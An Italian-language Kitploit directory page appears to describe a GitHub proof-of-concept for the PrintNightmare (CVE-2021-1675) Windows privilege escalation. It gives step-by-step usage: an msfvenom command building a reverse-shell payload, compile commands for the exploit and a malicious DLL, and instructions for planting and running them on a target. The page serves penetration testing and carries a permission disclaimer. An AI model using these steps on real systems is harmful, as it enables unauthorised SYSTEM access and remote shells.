Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/andrewtrube/cve-2021-1675
Escalation di PrivilegiFramework di ExploitExploitPenetration TestingRed TeamingSviluppo Payload
GitHubandrewtrube/cve-2021-1675

CVE-2021-1675

Elevazione dei privilegi locale per CVE-2021-1675 (PrintNightmare) che installa una DLL dannosa per ottenere accesso SYSTEM su sistemi Windows vulnerabili.

Vedi Repository
5154 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC di Escalation dei Privilegi Locali PrintNightmare

src/nightmare.cpp: codice sorgente per sfruttare CVE-2021-1675 e ottenere accesso di sistema installando una dll dannosa
src/payload-dll.cpp: codice sorgente per la dll con shellcode dannoso nella funzione di ingresso

!!Utilizzare solo su server su cui hai il permesso di testare

Riepilogo

CVE-2021-1675 è una vulnerabilità nel servizio Print Spooler di Microsoft Windows che consente a un attaccante di bypassare il controllo SeLoadDriverPrivilege. Questo può essere sfruttato per ottenere un'escalation dei privilegi sulla macchina target installando una DLL dannosa che chiama shellcode o utilizza l'API di Windows per stabilire una connessione reverse shell. Le versioni di Windows 10/8/Server 2008/Server 2012 precedenti all'8 giugno 2021 sono interessate.

POC

  1. Scarica o clona il repository git
  2. Usa msfvenom per generare un payload adatto in c $ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c
  3. Incolla l'output di msfvenom in payload-dll.cpp dove dice 'change me'
  4. Compila l'eseguibile principale x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool
  5. Compila la dll x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared
  6. Archivia l'exe e la dll, poi trova un modo per caricare l'archivio sulla macchina target zip ./bin/PrinterNightmareLPE.exe ./lib/
  7. Una volta che l'archivio è sulla macchina Windows target, estrailo
  8. Sposta evil.dll in c:\windows\temp\evil.dll
  9. Esegui PrintNightmareLPE.exe

Note

  • Se tutto funziona correttamente, l'exploit dovrebbe iterare attraverso i driver della stampante di Windows e stampare i risultati
  • Puoi cambiare il percorso del file da cui PrintNightmareLPE.exe carica evil.dll direttamente nel codice sorgente
  • attualmente la dll dannosa carica semplicemente calc.exe come Proof-of-Concept
Scarica lo strumento